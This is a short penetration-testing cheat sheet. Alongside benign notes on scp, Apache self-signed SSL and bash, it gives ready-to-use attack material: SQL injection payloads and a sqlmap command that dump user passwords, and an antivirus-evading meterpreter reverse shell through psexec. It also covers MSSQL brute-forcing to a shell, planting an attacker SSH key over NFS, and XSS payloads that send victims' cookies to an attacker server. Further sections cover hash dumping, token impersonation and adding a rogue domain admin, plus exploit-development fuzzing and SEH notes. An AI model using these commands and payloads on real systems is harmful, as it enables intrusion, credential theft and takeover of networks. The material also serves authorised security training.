CheatSheet (Short)

SCP

[+] Secure Copy (scp) Cheatsheet
--------------------------------
[>] Copy remote file to local host:
$ scp your_username@ip:<remote_file> /some/local/directory
[>] Copy local file to remote host:
$ scp <local_file> your_username@192.168.0.10:/some/remote/directory
[>] Copy local directory to remote directory:
scp -r <local_dir> your_username@ip:/some/remote/directory/<remote_dir>
[>] Copy a file from one remote host to another:
scp your_username@<host1>:/some/remote/directory/foobar.txt your_username@<host2>:/some/remote/directory/
[>] Improve scp performance (use blowfish):
scp -c blowfish <local_file> your_username@ip:/some/remote/directory

SQL Injection

[+] Union Based SQL Injection
' or 1=1#
1' ORDER BY 10#
1' UNION SELECT version(),2#
1' UNION SELECT version(),database()#
1' UNION SELECT version(),user()#
1' UNION ALL SELECT table_name,2 from information_schema.tables#
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#
1' UNION ALL SELECT concat(user,char(58),password),2 from users#
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

AV bypass

1. Generate executable using Veil.
2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp)
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST ip
RHOST => ip
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit

Apache SSL

# Enabling Self signed certificates on local website
1. Install OpenSSL
sudo apt-get install openssl
2. Run the following command to generate the self signed SSL certificates:
sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key
3. Enable SSL for Apache
sudo a2enmod ssl
4. Put the default-ssl site available creating a symbolic link
sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf
5. Edit the file default-ssl.conf
sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf
Change the following lines to point to the certs:
SSLCertificateFile /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key
6. Restart Apache
sudo /etc/init.d/apache2 restart
More information:
https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server

Attacking MS-SQL

[+] Attacking MSSQL with Metasploit
[>] Enumerate MSSQL Servers on the network:
msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info ip ip
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.
[>] Bruteforce MSSQL Database:
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
[>] Enumerate MSSQL Database:
msf > use auxiliary/admin/mssql/mssql_enum
[>] Gain shell using gathered credentials
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Bash Scripting

Simple Bash Scripting Cheatsheet
--------------------------------
[+] nano Shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of test.
ctrl x Exit editor.
[+] Create a text file:
touch file Creates an empty file.
ifconfig > tmp pipe the output of a command
nano file
[+] Create a file and append text to it:
ifconfig > tmp
echo >> tmp
ping google.com -c3 >> tmp
[+] How to view a file:
cat file Show entire contents of file.
more file Show one page at a time. Space bar for next page and (q) to exit.
head file Show the first 10 lines.
head -15 file Show the first 15 lines.
tail file Show the last 10 lines.
tail -15 file Show the last 15 lines.
tail -f file Useful when viewing the output of a log file.
[+] pipe
cat tmp | grep Bcast Feeds the output of one process to the input of another process.
[+] Processes
ps aux Show all running process for all users.
kill -9 PID Nicely kill a PID.
[+] Word Count
wc -l tmp2 Count the number of lines in a file
[+] cut
-d delimiter
-f fields
[+] sort
Sort by unique sort -u file
sort IP addresses correct sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address
[+] awk
awk '{print $1}' file Show the 1st column.
awk '{print $1,$5}' file Show the 1st and 5th columns.
[+] grep
grep -v Remove a single string.
grep -v 'red' file
[+] egrep -v
Remove multiple strings egrep -v '(red|white|blue)' file
[+] sed
sed 's/FOO/BAR/g' file Replace FOO with BAR.
sed 's/FOO//g' file Replace FOO with nothing.
sed '/^FOO/d' file Remove lines that start with FOO.
[+] colour
31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan
echo -e "\e[1;34mThis is a blue text.\e[0m"
Bash Scripts
------------
[+] Simple bash script:
#!/bin/bash
clear
echo
echo
print "Hello world."
[+] Make a file executable.
chmod +x file
chmod 755 file
[+] Variables
name=Bob
echo $name
user=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.
#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1`
echo "Hello" $name "Your IP address is:" $ip
[+] User Input
read -p "Domain: " domain
#!/bin/bash
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 $domain
[+] Check For No User Input
if [ -z $domain ]; then
echo
echo "#########################"
echo
echo "Invalid choice."
echo
exit
fi
[+] For loops
#!/bin/bash
for host in $(cat hosts.txt)
do
command $host
done
[+] One Liners
Port Scan:
for port in $(cat Ports.txt); do nc -nzv ip $port & sleep 0.5; done

CTF CS

CTF Notes
---------
# Enumerate Users via Finger
finger user@ip
# Show nfs shares available
showmount -e ip
# User nfspysh to mount share and create .ssh directory
nfspysh -o server=ip:/home/user
mkdir .ssh
cd .ssh
# Generate ssh key pair
ssh-keygen
cp id_rsa.pub /tmp/authorized_keys
# Transfer attacker public key to host
put /tmp/authorized_keys
exit
# Login to SSH server with no password
SSH_AUTH_SOCK=0 ssh user@ip

Cookie Stealing

[+] Cookie Stealing:
[-] Start Web Service
python -m SimpleHTTPServer 80
[-] Use one of the following XSS payloads:
<script>document.location="http://ip/?c="+document.cookie;</script>
<script>new Image().src="http://ip/index.php?c="+document.cookie;</script>

Domain Admin Exploitation

[+] After compromising a Windows machine:
[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain
[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts ip/24
msf > set threads 8
msf > run
msf> spool off
[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell
C:\> whoami
mydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain

Exploit-Dev

Exploit Development Cheatsheet
------------------------------
[+] Fuzzing:
import socket
buffer = ["A"]
counter = 50
while len(buffer) <= 1000:
buffer.append("A" * counter)
counter = counter + 50
for buffstring in buffer:
print "Fuzzing:" + str(len(buffstring))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect( ("192.168.0.20", 5555) )
sock.send(buffstring)
sock.close()
[+] Bad Character Testing:
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e"
"\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d"
"\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c"
"\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b"
"\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
"\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59"
"\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68"
"\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77"
"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86"
"\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95"
"\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4"
"\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3"
"\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe"
"\xff"
[+] Structured Exception Handler (SEH) Exploitation notes
- Crash the application
- Check SEH overwirte (view-seh chain)
- Find offset (!mona pattern_create <length>)
- Find certain SEH references to the cyclic pattern (!mona findmsp)
- Verify offset to NSEH (Next Exception)
- Find POP/POP/RET address with mona (!mona seh -cpb <bad chars>)
- Add short jump into payload to jump ofver SEH ("\xeb\x06" + 2 bytes of padding)
- Add shellcode to the payload
- Ensure existing padding to make sure the crash still happens.